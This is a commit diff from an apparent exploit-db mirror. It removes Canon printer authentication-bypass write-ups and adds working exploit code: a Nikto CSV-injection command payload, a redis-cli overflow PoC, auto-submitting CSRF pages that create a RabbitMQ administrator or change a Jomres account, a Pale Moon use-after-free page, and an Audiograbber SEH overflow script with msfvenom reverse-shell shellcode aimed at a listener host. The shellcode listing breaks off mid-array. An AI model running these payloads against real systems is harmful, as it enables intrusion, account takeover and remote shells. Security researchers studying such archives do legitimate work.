bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

DB: 2018-06-19

Browse source 
16 changes to exploits/shellcodes

Nikto 2.1.6 - CSV Injection
Pale Moon Browser < 27.9.3 - Use After Free (PoC)
Audiograbber 1.83 - Local Buffer Overflow (SEH)
Redis-cli < 5.0 - Buffer Overflow (PoC)
Microsoft COM for Windows - Privilege Escalation
Canon LBP6650/LBP3370/LBP3460/LBP7750C - Authenticaton Bypass
Canon MF210/MF220 - Authenticaton Bypass
Canon LBP7110Cw - Authentication Bypass
Canon LBP6030w - Authentication Bypass
Joomla! Component jomres 9.11.2 - Cross-Site Request Forgery
RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
Redatam Web Server < 7 - Directory Traversal
This commit is contained in:
Offensive Security 2018-06-19 05:01:47 +00:00
parent 329d5722a0
commit 086cfb2c76
13 changed files with 390 additions and 588 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

184
exploits/hardware/webapps/44844.txt
View file

@ -1,184 +0,0 @@
# Exploit Title: [ Incorrect Access Control in Canon LBP6650, LBP3370, LBP3460, LBP7750C]
# Date: [3.6.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://global.canon.com]
# Software Link: [ Website ]
# Severity: High
# Version: LBP6650, LBP3370, LBP3460, LBP7750C
# Tested on: Mozilla FireFox
# Description : An issue was discovered on Canon LBP6650, LBP3370, LBP3460, LBP7750C printers.
It is possible for a remote (unauthenticated) attacker to bypass the Administrator Mode authentication without a password at any URL of the device that requires authentication.
# PoC :
Start searching for Canon LBP6650 ,LBP3370, LBP3460 printers.
You can recognize them with the /tlogin.cgi parameter, but the version is
also been displayed on the webinterface.
https://imgur.com/a/QE3GfLw
# Example :
1. Go to the following url: http://127.0.0.1/tlogin.cgi
2. Click on Administrator Mode
3. Intercept now the request with Burpsuite and click on 'Ok'' to login.
And forward the request till you get the ''/frame.cgi?page=DevStatus''
parameter.
# Request :
GET /frame.cgi?page=DevStatus HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/tlogin.cgi
Cookie: CookieID=1610705327:; Login=11
Connection: close
Upgrade-Insecure-Requests: 1
# Response :
HTTP/1.1 200 OK
Date: MON, 05 JAN 1970 16:35:57 GMT
Server: CANON HTTP Server
Content-Type: text/html
Content-Length: 5652
<html>
<head>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<meta http-equiv="pragma" content="no-cache"/>
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0"/>
<meta http-equiv="expires" content="Thu 01 Jan 1970 00:00:00 GMT"/>
<script language="JavaScript">
document.write('<title>Remote UI <');
switch("DevStatus")
{
case "DevStatus":document.write('Status');break;
case "DevError":document.write('Error Information');break;
case "DevUtil":document.write('Utility Menu');break;
case "DevCtrl":document.write('Device Control');break;
case "DevCalib":document.write('Calibration');break;
case "DevInfo":document.write('Device Information');break;
case "DevInfoSetDev":document.write('Change Device Information');break;
case "DevInfoSetSecu":document.write('Change Administrator Settings');break;
case "DevInfoSetIpSecu":document.write('Change IP Address Range');break;
case "DevInfoSetIpv6Secu":document.write('Change IP Address Range');break;
case "DevInfoSetMacSecu":document.write('Change Receiving Permitted MAC
Address');break;
case "DevInfoSetRuiSecu":document.write('Change Remote UI Setting');break;
case "KeyManageSet":document.write('Key and Certificate');break;
case "KeyManageDetail":document.write('Certificate Details');break;
case "KeyManageNewKey":document.write('Generate Key and Certificate');break;
case "KeyManageNewCert":document.write('#&Title_KeyManageNewCert');break;
case "KeyManageKeyInst":document.write('Install Key and Certificate');break;
case "KeyManageKeyPasswd":document.write('Enter Private Key
Password');break;
case "CaManageSet":document.write('CA Certificate');break;
case "CaManageDetail":document.write('Certificate Details');break;
case "CaManageKeyInst":document.write('Install CA Certificate');break;
case "JobHistory":document.write('Job Log Display');break;
case "DevFeature":document.write('Features');break;
case "DevNetwork":document.write('Network');break;
case "DevNetworkSetTcpip":document.write('Change TCP/IP Settings');break;
case "DevNetworkSetNetware":document.write('Change NetWare Settings');break;
case "DevNetworkSetApTalk":document.write('Change AppleTalk
Settings');break;
case "DevNetworkSetSMB":document.write('Change SMB Protocol
Settings');break;
case "DevNetworkSetNetIF":document.write('Change Ethernet Driver
Setting');break;
case "DevNetworkSetSNMP":document.write('Change SNMP Settings');break;
case "DevNetworkSetSNMPV3User":document.write('User Settings');break;
case "DevNetworkSetSNMPV3ConText":document.write('Context Settings');break;
case "DevNetworkSetSNMPV3ConTextSet":document.write('Context
Settings');break;
case "DevNetworkSetSpool":document.write('Change Spooler Setting');break;
case "DevNetworkSetNWakeUp":document.write('Change Startup Time');break;
case "DevNetworkParList":document.write('Parameter List');break;
case "DevNetworkFactDef":document.write('Initialize Network
Settings');break;
case "DevNetworkSetEmail":document.write('Change E-mail Print
Settings');break;
case "EmailRecv":document.write('Receive E-mails');break;
case "DevIDControl":document.write('Department ID Management');break;
case "DevIDSetting":document.write('Department ID Management');break;
case "DevIDRegist":document.write('Department ID Management');break;
case "DevIDEdit":document.write('Department ID Management');break;
case "DevCount":document.write('Counter Check');break;
case "JobPrtProp":document.write('Print Job Details');break;
case "JobPrtSecure":document.write('Unlock');break;
case "JobStore":document.write('Stored Job');break;
case "JobStoreList":document.write('#&Title_JobStoreList');break;
case "JobStoreEnterPwd":document.write('Enter Password');break;
case "JobStoreProp":document.write('Stored Job Details');break;
case "JobStoreExec":document.write('Print Stored Job');break;
case "JobStoreBoxProp":document.write('Change Box Settings');break;
case "JobLog":document.write('Print Log');break;
case "EmailLog":document.write('E-mail Receive Log');break;
case "PdfPrint":document.write('Direct Print');break;
case "PsPrint":document.write('Direct Print');break;
case "ImgPrint":document.write('Direct Print');break;
case "CfgCtrl":document.write('Control Menu');break;
case "CfgCtrlSet":document.write('Change Control');break;
case "CfgCtrlTimeSet":document.write('Change Date and Time');break;
case "CfgPaper":document.write('Paper Source Menu');break;
case "CfgPaperSet":document.write('Change Paper Source');break;
case "CfgLayout":document.write('Layout Menu');break;
case "CfgLayoutSet":document.write('Change Layout');break;
case "CfgQuality":document.write('Quality Menu');break;
case "CfgQualitySet":document.write('Change Quality');break;
case "CfgUserMainte":document.write('User Maintenance Menu');break;
case "CfgUserMainteSet":document.write('Change User Maintenance');break;
case "CfgExpCard":document.write('Extension Card');break;
case "SupLink":document.write('Support Links');break;
case "SupLinkSet":document.write('Edit Support Links');break;
case "Debug":document.write('Debug');break;
case "Syslog":document.write('System Log');break;
default:document.write('');break;
}
document.write('> : LBP6650 ; LBP6650</title>');
var url = new String(document.location);
var ssl = "0";
if( ssl == '1')
{
if(url.match("https") == null )
{
document.location.href = "blank.html";
}
}
</script>
</head>
<frameset cols="185,*" frameborder="NO" border="0" framespacing="0" >
<frame src="/menu.cgi?Type=DEVICE" marginwidth="8" marginheight="0"
name="Index" noresize scrolling="NO">
<frame src="/dstatus.cgi" name="Body">
</frameset>
<noframes>
<body>
</body>
</noframes>
</html>
# Do we have now access to the printer with Admin Mode? : Yes
# How to fix this? : Remove the default password and add a new (strong) password.
# Screenshot : https://imgur.com/a/ISDL1Qf (Administrator Mode)

323
exploits/hardware/webapps/44845.txt
View file

@ -1,323 +0,0 @@
# Exploit Title: [ Incorrect Access Control in Canon MF210 & MF220 Series ]
# Date: [4.6.2018]
# Exploit Author: [Huy Kha]
# Vendor Homepage: [http://global.canon.com]
# Software Link: [ Website ]
# Version: MF210 & MF20 Series
# Severity: High
# Tested on: Mozilla FireFox
# Description : An issue was discovered on Canon MF210 & MF220 printers webinterface.
It is possible for a remote (unauthenticated) attacker to bypass the System Manager Mode authentication without a PIN at any URL of the device that requires authentication.
# PoC :
Start searching for Canon MF210 & MF220 printers.
You can recognize them with the /login.html parameter, but the version is
also been displayed on the webinterface.
https://imgur.com/a/5ON4HF6
# Example :
1. Go to the following url: http://127.0.0.1/login.html
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to login. And forward the request till you get the ''/portal_top.html'' parameter.
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://129.2.52.116/login.html
Cookie: fusion-http-session-id=TYFMNOVENYXIJSRENKDC
Connection: close
Upgrade-Insecure-Requests: 1
# Response :
HTTP/1.1 200 OK
Expires: Thu, 1 Jan 1998 00:00:00 GMT
Content-Type: text/html
Content-Length: 6119
Pragma: no-cache
Cache-Control: no-store, no-cache, max-age=0
Connection: close
Set-Cookie:
fusion-http-session-id=TYFMNOVENYXIJSRENKDC;Comment=;Version=;HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "
http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<meta http-equiv="pragma" content="no-cache" />
<meta http-equiv="cache-control" content="no-cache,no-store,max-age=0" />
<meta http-equiv="expires" content="Thu, 01 Jan 1970 00:00:00 GMT" />
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<link rel="shortcut icon" type="image/x-icon" href="media/favicon.ico" />
<link rel="stylesheet" type="text/css" media="all" href="css/ja.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/common.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/portal.css" />
<link rel="stylesheet" type="text/css" media="all" href="css/icons.css" />
<script type="text/javascript" src="js/rui.js"></script>
<script language="javascript">
function unloadFunc(e) { }
registEvent(window, "unload", unloadFunc);
</script>
<title>Remote UI: Portal: MF220&nbsp;Series: MF220 Series</title>
</head>
<body>
<div id="container">
<div id="ruiPotalSet">
<div class="Wrapper">
<div id="portalBranding">
<h1 id="deviceLogo">
<a href="portal_top.html">
<img src="media/branding_logo_imageCLASS.png" />
</a>
</h1>
<div id="productInformation">
<table>
<caption></caption>
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<tbody>
<tr>
<th>Device Name:</th>
<td>MF220&nbsp;Series </td>
</tr>
<tr>
<th>Product Name:</th>
<td>MF220 Series </td>
</tr>
<tr>
<th>Location:</th>
<td> </td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="commonTools">
<fieldset id="authTools">
<p><a href="/logout.cgi"><span class="Name">Log Out</span></a></p>
</fieldset>
</div>
</div>
<hr />
</div>
<div id="applications">
<div id="portalApplicationBranding">
<div class="Wrapper">
<h1 id="applicationLogo"><img src="media/app_icon.png" /><span
class="BrandingName">Remote UI: Portal</span></h1>
<div id="appTools">
<a href="mailto:"><span class="Name">Mail to System Manager</span></a>
</div>
</div>
</div>
<hr />
<div id="applicationContents">
<div class="Wrapper">
<div id="contentsWrapper">
<div id="contents">
<div id="contentHeading_potal">
<h2 class="PageName">Device Info</h2>
<div id="contentHeadingTools">
<div id="tmpUpdate">Last Updated:06/04/2018 04:27 AM</div>
<div id="tmpReload">
<a href="javascript:location.reload()"><img src="media/bh_updt.gif"
alt="Update" title="Update" /></a>
</div>
</div>
</div>
<hr />
<h2>Contents</h2>
<div id="quotationModule">
<div class="QuotationModuleHeading"><h3></h3></div>
<div class="QuotationModuleElement">
<div id="deviceBasicInformation" class="ContentModule">
<div class="ModuleHeading"><h4>Device Basic Information</h4></div>
<div id="deviceStatusModule" class="ModuleElement">
<h5>Device Status</h5>
<table class="PropertyListComponent">
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColum" />
</colgroup>
<tbody>
<tr>
<th>Printer:</th>
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
<span class="StatusMessage">Sleep mode.</span>
</td>
</tr>
<tr>
<th>Scanner:</th>
<td><span class="StatusIcon"><img src="media/sg_off.gif"/></span>
<span class="StatusMessage">Sleep mode.</span>
</td>
</tr>
<tr>
<th>Fax:</th>
<td><span class="StatusIcon"><img src="media/sg_ok.gif"/></span>
<span class="StatusMessage">Ready to send or receive faxes.</span>
</td>
</tr>
</tbody>
</table>
</div>
<div id="deviceErrorInfoModule" class="ModuleElement">
<h5>Error Information</h5>
<p>No errors.</p>
</div>
</div>
<div id="MaintenanceInfomationModule" class="ContentModule">
<div class="ModuleHeading"><h4>Consumables Information</h4></div>
<div id="paperInfomationModule" class="ModuleElement">
<input type="button" class="ButtonEnable" value="Check Consumables Details"
onclick="location.href='consumables_check.html'"/>
<h5>Paper Information</h5>
<table summary="Paper Source, Remaining Paper, Paper Size">
<colgroup>
<col class="PaperSourceColumn" />
<col class="RemainColumn" />
<col class="PaperSizeColumn" />
<col class="PaperTypeColumn" />
</colgroup>
<thead>
<tr>
<th>Paper Source</th>
<th>Paper Level</th>
<th>Paper Size</th>
<th>Paper Type</th>
</tr>
</thead>
<tbody>
<tr>
<th>Multi-Purpose Tray</th>
<td>None</td>
<td>LTR</td>
<td>Plain (16 lb Bond-23 lb Bond)</td>
</tr>
<tr>
<th>Drawer 1</th>
<td>OK</td>
<td>LTR</td>
<td>Plain (16 lb Bond-23 lb Bond)</td>
</tr>
</tbody>
</table>
</div>
<div id="tonerInfomationModule" class="ModuleElement">
<h5>Cartridge Information</h5>
<table>
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<thead>
<tr>
<th>Color</th>
<th>Level</th>
</tr>
</thead>
<tbody>
<tr>
<th>Black</th>
<td><img src="media/ink_bk06.gif" alt="" title="" />60%</td>
</tr>
</tbody>
</table>
</div>
</div>
<div id="linkInformationModule" class="ContentModule">
<div class="ModuleHeading"><h4>Support Link</h4></div>
<div class="ModuleElement">
<table class="PropertyListComponent">
<colgroup>
<col class="ItemNameColumn" />
<col class="ItemValueColumn" />
</colgroup>
<tbody>
<tr>
<th>Support Link:</th>
<td></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
</div>
</div>
</div>
<hr />
<div id="navigationWrapper">
<div id="navigation">
<h2>menu</h2>
<div id="navStandard">
<h3 class="GroupTitle">Standard Tool</h3>
<ul>
<li class="Main">
<a href="j_plist.html" class="Standby SystemMain"><span class="Name">Status
Monitor/Cancel</span></a>
</li>
<li class="Main">
<a href="p_paper.html" class="Standby UsermodeMain"><span
class="Name">Settings/Registration</span></a>
</li>
</ul>
</div>
<div id="navGeneral">
<ul>
<li class="Main">
<a href="a_addresslistone.html" class="Standby AddressMain">
<span class="Name">Address Book</span></a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<hr />
<div id="applicationInfo">
<address class="SiteInforLegal">Copyright CANON INC. 2014</address>
</div>
</div>
</div>
</body>
</html>
# Do we have now access to the printer with System Manager Mode? : Yes
# Screenshot : https://imgur.com/a/U6oBYNV
# How to fix this? : Remove the default password and add a new (strong) password.

39
exploits/hardware/webapps/44885.txt
View file

@ -1,39 +0,0 @@
# Exploit Title: Canon LBP7110Cw - Authentication Bypass
# Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP7110Cw
# CVE: CVE-2018-12049
# Severity: High (Leads to full System Manager Mode account take-over)
# Description : A remote attacker can bypass the Management Mode on the
# Canon LBP7110Cw web interface without a PIN for /checkLogin.cgi via
# vectors involving /portal_top.html to get full access to the device.
# PoC :
# As you can see when we're type a random password.
# You'll get an error for an incorrect authentication.
# Now with a simple request, we can bypass the authentication
# and get full access to the printer with ''Management Mode''
1. Go to the following url: http://TargetURL/
2. Click on Management Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request
to the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://164.125.112.38/
Cookie: sessid=QegLH5ETb92HEEPWr55AiA##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with Management Mode? : Yes
# Impact: A remote attacker can have take-over the whole printer

38
exploits/hardware/webapps/44886.txt
View file

@ -1,38 +0,0 @@
# Exploit Title: Canon LBP6030w - Authentication Bypass
# Date: 2018-06-07
# Exploit Author: Huy Kha
# Vendor Homepage: http://global.canon.com
# Version: LBP6030w
# Severity: High (Leads to full System Manager Mode account take-over)
# CVE: CVE-2018-12049
# Description : A remote attacker can bypass the System Manager Mode on the
# Canon LBP6030w web interface without a PIN for /checkLogin.cgi via vectors
# involving /portal_top.html to get full access to the device.
# PoC :
# Now with a simple request, we can bypass the authentication and get full
# access to the printer with ''System Manager Mode''
1. Go to the following url: http://TargetURL/
2. Click on System Manager Mode
3. Intercept now the request with Burpsuite and click then on 'Ok'' to
login. And now you have to forward POST /checkLogin.cgi HTTP/1.1 request to
the GET /portal_top.html HTTP/1.1
# Request :
GET /portal_top.html HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://23.125.171.217/
Cookie: sessid=TOIJNROiOcNQQaGdHeQ3PQ##
Connection: close
Upgrade-Insecure-Requests: 1
# Do we have now access to the printer with System Manager? : Yes
# Impact: A remote attacker can have take-over the whole printer if there
# is no PIN set by a user.

52
exploits/linux/local/44899.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Nikto 2.1.6 - CSV Injection
# Google Dork: N/A
# Date: 2018-06-01
# Exploit Author: Adam Greenhill
# Vendor Homepage: https://cirt.net/Nikto2
# Software Link: https://github.com/sullo/nikto
# Affected Version: 2.1.6, 2.1.5
# Category: Applications
# Tested on: Kali Linux 4.14 x64
# CVE : CVE-2018-11652
# Technical Description:
# CSV Injection vulnerability in Nikto 2.1.6 and earlier allows remote attackers
# to inject arbitrary OS commands via the Server field in an HTTP response header,
# which is directly injected into a CSV report.
# PoC
# Install nginx and nginx-extras: apt-get install -y nginx nginx-extras
# Configure the nginx server as follows by editing the /etc/nginx/nginx.conf file:
user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;
events {
worker_connections 768;
# multi_accept on;
}
http {
server_tokens off; # removed pound sign
more_set_headers "Server: =cmd|' /C calc'!'A1'";
server {
listen 80;
server_name localhost;
location /hello {
return 200 "hello world";
}
}
}
# Restart the server: service nginx restart
# Scan the nginx server with Nikto configured to output the results to a CSV file:
nikto -h <nginx address>:80 -o vuln.csv
# Open the resulting CSV file in Microsoft Excel and observe that CMD is attempting
# to execute

21
exploits/linux/local/44904.py Executable file
View file

@ -0,0 +1,21 @@
# Exploit Title: Redis-cli < 5.0 - Buffer Overflow (PoC)
# Date: 2018-06-13
# Exploit Author: Fakhri Zulkifli
# Vendor Homepage: https://redis.io/
# Software Link: https://redis.io/download
# Version: 5.0, 4.0, 3.2
# Fixed on: 5.0, 4.0, 3.2
# CVE : CVE-2018-12326
# Buffer overflow in redis-cli of Redis version 3.2, 4.0, and 5.0 allows a local attacker
# to achieve code execution and escalate to higher privileges via a long string in the hostname parameter.
$ ./src/redis-cli -h `python -c 'print "A" * 300'`
Could not connect to Redis at AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:6379: Name or service not known
#0 0x4a4182 in vsnprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1566
#1 0x4a42d0 in snprintf /home/user/llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1637
#2 0x570159 in repl /home/user/redis/src/redis-cli.c:1624:5
#3 0x55ba77 in main /home/user/redis/src/redis-cli.c:6660:9
#4 0x7f6be5f6e82f in __libc_start_main /build/glibc-Cl5G7W/glibc-2.23/csu/../csu/libc-start.c:291
#5 0x4247a8 in _start (/home/user/redis/src/redis-cli+0x4247a8)

24
exploits/linux/webapps/44902.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
# Date: 2018-06-17
# Author: Dolev Farhi
# Vendor or Software Link: www.rabbitmq.com
# Version: 3.7.6
# Tested on: Ubuntu
<html>
<h2>Add RabbitMQ Admin</h2>
<body>
<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
<input type="hidden" name="username" value="rootadmin" />
<input type="hidden" name="password" value="rootadmin" />
<input type="hidden" name="tags" value="administrator" />
<input type="submit" value="save" />
</form>
<script>
window.onload = rabbit.submit()
</script>
</body>
</html>

37
exploits/php/webapps/44901.html Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Joomla!Component jomres 9.11.2 - Cross site request forgery
# Date: 2018-06-15
# Exploit Author: L0RD
# Vendor Homepage: https://www.jomres.net/
# Software link: https://extensions.joomla.org/extension/jomres/
# Software Download: https://github.com/WoollyinWalesIT/jomres/releases/download/9.11.2/jomres.zip
# Version: 9.11.2
# Tested on: Kali linux
===================================================
# POC :
<html>
<head>
<title>CSRF POC</title>
</head>
<body>
<form action="http://127.0.0.1/jomres/index.php?cmd=account/index" method="POST">
<input type="hidden" name="password" value="decode" />
<input type="hidden" name="password&#95;verify" value="decode" />
<input type="hidden" name="email" value="borna&#46;nematzadeh123&#64;gmail&#46;com" />
<input type="hidden" name="first&#95;name" value="decode" />
<input type="hidden" name="last&#95;name" value="test" />
<input type="hidden" name="company" value="test" />
<input type="hidden" name="vat&#95;no" value="100000000" />
<input type="hidden" name="address1" value="test1" />
<input type="hidden" name="address2" value="test2" />
<input type="hidden" name="city" value="New&#32;York" />
<input type="hidden" name="county" value="test" />
<input type="hidden" name="postalcode" value="100001" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
===================================================

37
exploits/windows/local/44900.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Pale Moon Browser < 27.9.3 - Use After Free (PoC)
# Date: 2018-06-13
# Author - Berk Cem Goksel
# Vendor Homepage: https://www.palemoon.org/
# Software Link: https://www.palemoon.org/palemoon-win32.shtml
# Version: Versions prior to 27.9.3 (Tested versions: 27.9.0, 27.9.1, 27.9.2)
# Tested on: Windows 10
# Category: Windows Remote Exploit
# CVE : CVE-2018-12292
<html>
<head>
<style>
</style>
<script>
function SetVariable(fuzzervars, var_name, var_type) {
fuzzervars[var_type] = var_name;
}
function jsfuzzer() {
var var_1 = var_2.getDistributedNodes();
SetVariable(var_1, 'NodeList');
}
</script>
</head>
<body onload=jsfuzzer()>
<!-- beginhtml -->
<content id="var_2" loopend="1" default="" max="0" charset="ISO-2022-JP"></content>
<!-- endhtml -->
</body>
</html>

110
exploits/windows/local/44903.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: Audiograbber 1.83 - Local Buffer Overflow (SEH)
# Date: 2018-06-16
# Exploit Author: Dennis 'dhn' Herrmann
# Vendor Homepage: https://www.audiograbber.org/
# Version: 1.83
# Tested on: Windows 7 SP1 (x86)
#!/usr/bin/env python
# $Id: exploit.py,v 1.0 2018/06/16 13:25:59 dhn Exp $
#
# Tested with Windows 7 SP1 (x86)
# Steps:
# - Paste "poc.txt" content in the "Interpret" or "Album" field
class Exploit:
def __init__(self, shellcode):
self._shellcode = shellcode
self._payload = None
def __write(self):
f = open("poc.txt", "w")
f.write(self._payload)
f.close()
def run(self):
pattern = "A" * 256
jmp_short = "\xeb\x08\x90\x90" # short JMP
pop2ret = "\x79\x91\x01\x10" # WMA8Connect.dll
self._payload = pattern
self._payload += jmp_short
self._payload += pop2ret
# The buffer is mangled so we have to jump
# over the parts to reached our shellcode
self._payload += "\x90" * 18 + jmp_short
self._payload += "\x90" * 28 + jmp_short
self._payload += "\x90" * 32 + self._shellcode
self.__write()
def main():
# msfvenom --platform windows -p windows/shell_reverse_tcp \
# LHOST=10.168.142.129 LPORT=443 -b "\x00\x0a\x0d" \
# -e x86/alpha_mixed -f py
shellcode = (
"\xda\xcd\xd9\x74\x24\xf4\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51"
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50"
"\x38\x41\x42\x75\x4a\x49\x39\x6c\x59\x78\x6f\x72\x77"
"\x70\x73\x30\x73\x30\x43\x50\x4e\x69\x6b\x55\x55\x61"
"\x69\x50\x32\x44\x6c\x4b\x76\x30\x70\x30\x6e\x6b\x50"
"\x52\x54\x4c\x4c\x4b\x72\x72\x47\x64\x6c\x4b\x74\x32"
"\x46\x48\x36\x6f\x6d\x67\x73\x7a\x67\x56\x74\x71\x6b"
"\x4f\x4e\x4c\x37\x4c\x51\x71\x53\x4c\x53\x32\x34\x6c"
"\x75\x70\x59\x51\x78\x4f\x56\x6d\x73\x31\x79\x57\x6b"
"\x52\x4b\x42\x71\x42\x56\x37\x4c\x4b\x63\x62\x74\x50"
"\x6e\x6b\x52\x6a\x57\x4c\x4c\x4b\x42\x6c\x54\x51\x32"
"\x58\x4d\x33\x37\x38\x57\x71\x58\x51\x76\x31\x4e\x6b"
"\x33\x69\x31\x30\x37\x71\x4e\x33\x6e\x6b\x61\x59\x47"
"\x68\x4a\x43\x47\x4a\x43\x79\x4e\x6b\x76\x54\x6e\x6b"
"\x37\x71\x38\x56\x74\x71\x59\x6f\x4c\x6c\x4b\x71\x78"
"\x4f\x36\x6d\x36\x61\x68\x47\x75\x68\x6b\x50\x70\x75"
"\x39\x66\x55\x53\x31\x6d\x4c\x38\x35\x6b\x73\x4d\x71"
"\x34\x62\x55\x4a\x44\x73\x68\x4c\x4b\x31\x48\x61\x34"
"\x76\x61\x58\x53\x30\x66\x6e\x6b\x76\x6c\x50\x4b\x4e"
"\x6b\x31\x48\x35\x4c\x67\x71\x59\x43\x4c\x4b\x37\x74"
"\x4c\x4b\x53\x31\x4e\x30\x4b\x39\x33\x74\x55\x74\x45"
"\x74\x73\x6b\x43\x6b\x31\x71\x31\x49\x53\x6a\x43\x61"
"\x4b\x4f\x79\x70\x63\x6f\x73\x6f\x70\x5a\x4c\x4b\x64"
"\x52\x5a\x4b\x6c\x4d\x43\x6d\x52\x48\x30\x33\x67\x42"
"\x37\x70\x73\x30\x35\x38\x34\x37\x53\x43\x76\x52\x33"
"\x6f\x53\x64\x63\x58\x30\x4c\x33\x47\x76\x46\x44\x47"
"\x6b\x4f\x38\x55\x6d\x68\x4a\x30\x37\x71\x47\x70\x47"
"\x70\x55\x79\x69\x54\x76\x34\x46\x30\x35\x38\x45\x79"
"\x6d\x50\x70\x6b\x57\x70\x79\x6f\x4a\x75\x56\x30\x56"
"\x30\x30\x50\x46\x30\x73\x70\x30\x50\x43\x70\x72\x70"
"\x62\x48\x4b\x5a\x44\x4f\x59\x4f\x6d\x30\x49\x6f\x7a"
"\x75\x7a\x37\x51\x7a\x55\x55\x53\x58\x76\x6a\x6e\x48"
"\x4c\x4e\x6e\x61\x73\x58\x44\x42\x67\x70\x47\x71\x4f"
"\x4b\x4d\x59\x4d\x36\x53\x5a\x34\x50\x70\x56\x76\x37"
"\x31\x78\x6e\x79\x49\x35\x44\x34\x53\x51\x49\x6f\x68"
"\x55\x6d\x55\x6f\x30\x50\x74\x36\x6c\x69\x6f\x50\x4e"
"\x56\x68\x52\x55\x6a\x4c\x73\x58\x6a\x50\x58\x35\x6c"
"\x62\x46\x36\x59\x6f\x48\x55\x32\x48\x43\x53\x30\x6d"
"\x63\x54\x77\x70\x6f\x79\x78\x63\x56\x37\x32\x77\x46"
"\x37\x50\x31\x59\x66\x32\x4a\x46\x72\x53\x69\x62\x76"
"\x79\x72\x59\x6d\x52\x46\x59\x57\x63\x74\x51\x34\x37"
"\x4c\x76\x61\x66\x61\x6c\x4d\x61\x54\x44\x64\x42\x30"
"\x6b\x76\x73\x30\x42\x64\x63\x64\x52\x70\x31\x46\x51"
"\x46\x50\x56\x42\x66\x30\x56\x62\x6e\x71\x46\x76\x36"
"\x36\x33\x71\x46\x42\x48\x74\x39\x7a\x6c\x55\x6f\x4f"
"\x76\x59\x6f\x6b\x65\x4b\x39\x59\x70\x70\x4e\x66\x36"
"\x30\x46\x59\x6f\x64\x70\x31\x78\x67\x78\x6c\x47\x67"
"\x6d\x35\x30\x49\x6f\x78\x55\x4d\x6b\x58\x70\x6d\x65"
"\x6f\x52\x36\x36\x73\x58\x6c\x66\x7a\x35\x4d\x6d\x6d"
